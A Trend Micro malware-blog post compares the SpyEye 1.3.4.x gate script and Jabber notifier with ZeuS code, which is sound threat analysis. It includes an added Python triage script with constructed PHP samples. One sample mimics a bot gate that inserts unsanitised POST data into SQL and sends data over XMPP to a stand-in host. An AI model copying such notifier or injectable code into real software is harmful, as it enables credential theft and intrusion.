SpyEye 1.3.4.x Comes with Noteworthy Modifications (Part 2)
This entry is a follow-up to my blog post last week in which I noted some significant changes that have been made to SpyEye ver. 1.3.4.x. Further observation revealed other modifications that made me think we are getting closer to the merger of the SpyEye and ZeuS botnets.
This SpyEye version comes with a Gate, a CN1 and a SYN1 installer.
This installer page creates the gate.php used for POST requests between the bots and the CN1 control panel. Through this file, the bots send information about the infected system, such as its IP address, location, and OS, to the CN1 panel. The gate.php code functions similarly to previous versions, though certain improvements are easy to spot. In this version, gate.php can access the database by itself. In previous versions, doing so required config.php to retrieve the necessary information (e.g., domain/IP address, user name and password) from the database. The new gate.php does not require data from external files: all of the information it needs is either contained in the file itself or obtained through its own functions.
Compare the following code snippets from versions 1.3.0.5 and 1.3.4.x of the gate.php file:
I also noticed that SpyEye 1.3.4.x has a Jabber Notifier, as previous ZeuS builders did. That feature let bot masters receive stolen banking credentials more efficiently than by letting the data go through a control panel. This is an improvement, as previous SpyEye versions only allowed access to the data via a control panel.
Let us take a look at the Jabberclass.php file of ZeuS 2.0.8.9:
Do you see the same thing? The said code looks like it was simply cut and pasted onto SpyEye’s Jabber Notifier from that of ZeuS. I can assure you that I did not use the same screenshots for the figures.
The only difference between the two is that the gate.php code of ZeuS 2.0.8.9 calls jabberclass.php while that of SpyEye does not. SpyEye already has the equivalent of the jabberclass.php file included in its gate.php code, making it unnecessary to include a separate file just for Jabber notifications. SpyEye also uses a plug-in called jabbernotifier.dll in its config file.
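The two traits described above, database credentials carried inline instead of being pulled from an external config.php, and Jabber/XMPP client code living in the same gate file, are exactly the kind of thing a responder can look for when triaging PHP files on a web host suspected of hosting a control panel. The following is an added example written for this post, not SpyEye or ZeuS code and not code from the original article; the PHP samples it scans are constructed for the demonstration, and the connect-call and XMPP marker lists are assumptions about what a hand-rolled gate script typically contains.

```python
"""Static triage heuristics for a suspected web-panel gate script (added example).

Scores a PHP source string for two traits: database credentials passed as string
literals to a connect call (rather than read from an included config.php), and
strings typical of an embedded XMPP/Jabber client. The PHP below is constructed
sample input, not malware source.
"""
import re

# Classic PHP database connect calls (assumption: the gate uses one of these;
# other drivers would need their own pattern). Captures host, user, password
# when all three are string literals.
DB_CONNECT_RE = re.compile(
    r"\b(?:mysql_connect|mysqli_connect|new\s+mysqli|new\s+PDO)\s*\(\s*"
    r"(['\"])([^'\"]+)\1\s*,\s*(['\"])([^'\"]*)\3\s*,\s*(['\"])([^'\"]*)\5",
    re.IGNORECASE,
)
# include/require of an external file, e.g. require_once('config.php').
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.IGNORECASE
)
# Strings a hand-rolled XMPP client must emit: stream open, client namespace,
# SASL auth namespace, message stanza.
XMPP_MARKERS = ("<stream:stream", "jabber:client", "urn:ietf:params:xml:ns:xmpp-sasl", "<message")


def find_inline_db_credentials(php):
    """Return (host, user, password) tuples passed as literals to a DB connect call."""
    return [(m.group(2), m.group(4), m.group(6)) for m in DB_CONNECT_RE.finditer(php)]


def find_includes(php):
    """Return the file names the script includes or requires."""
    return INCLUDE_RE.findall(php)


def xmpp_markers_present(php):
    """Return the XMPP marker strings found in the source (case-insensitive)."""
    low = php.lower()
    return [m for m in XMPP_MARKERS if m.lower() in low]


def triage_gate_script(php):
    """Summarise the indicators found in one PHP source string."""
    creds = find_inline_db_credentials(php)
    includes = find_includes(php)
    xmpp = xmpp_markers_present(php)
    indicators = []
    if creds:
        indicators.append("inline_db_credentials")
    if not includes:
        indicators.append("self_contained")      # no external config pulled in
    if len(xmpp) >= 2:
        indicators.append("embedded_xmpp_client")
    return {"credentials": creds, "includes": includes,
            "xmpp_markers": xmpp, "indicators": indicators}


# Constructed sample: older layout, connection details come from config.php.
OLD_STYLE_GATE = """<?php
require_once('config.php');
$db = mysql_connect($cfg['host'], $cfg['user'], $cfg['pass']);
$ip = $_SERVER['REMOTE_ADDR'];
mysql_query("INSERT INTO bots (ip, os) VALUES ('$ip', '" . $_POST['os'] . "')");
?>"""

# Constructed sample: self-contained layout with literal credentials and an
# in-file Jabber notifier. Host names and the password are placeholders.
NEW_STYLE_GATE = """<?php
$db = mysql_connect('127.0.0.1', 'gate_user', 'N0tAR3alPassw0rd');
mysql_select_db('panel', $db);
$ip = $_SERVER['REMOTE_ADDR'];
mysql_query("INSERT INTO bots (ip, os) VALUES ('$ip', '" . $_POST['os'] . "')");
function jabber_notify($text) {
    $s = fsockopen('jabber.example', 5222);
    fwrite($s, "<stream:stream to='jabber.example' xmlns='jabber:client'>");
    fwrite($s, "<auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN'>...</auth>");
    fwrite($s, "<message to='operator@jabber.example'><body>$text</body></message>");
}
?>"""

if __name__ == "__main__":
    for name, src in (("old", OLD_STYLE_GATE), ("new", NEW_STYLE_GATE)):
        print(name, triage_gate_script(src)["indicators"])
```

Run against a directory of PHP files, the script flags the combination the post describes (literal credentials, no include, XMPP stanzas in one file); a legitimate application rarely shows all three at once, so the combined indicator list is a better triage signal than any single regex hit.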
As previously stated, the ZeuS-SpyEye merger indeed seems to be on its way.
Post from: TrendLabs | Malware Blog – by Trend Micro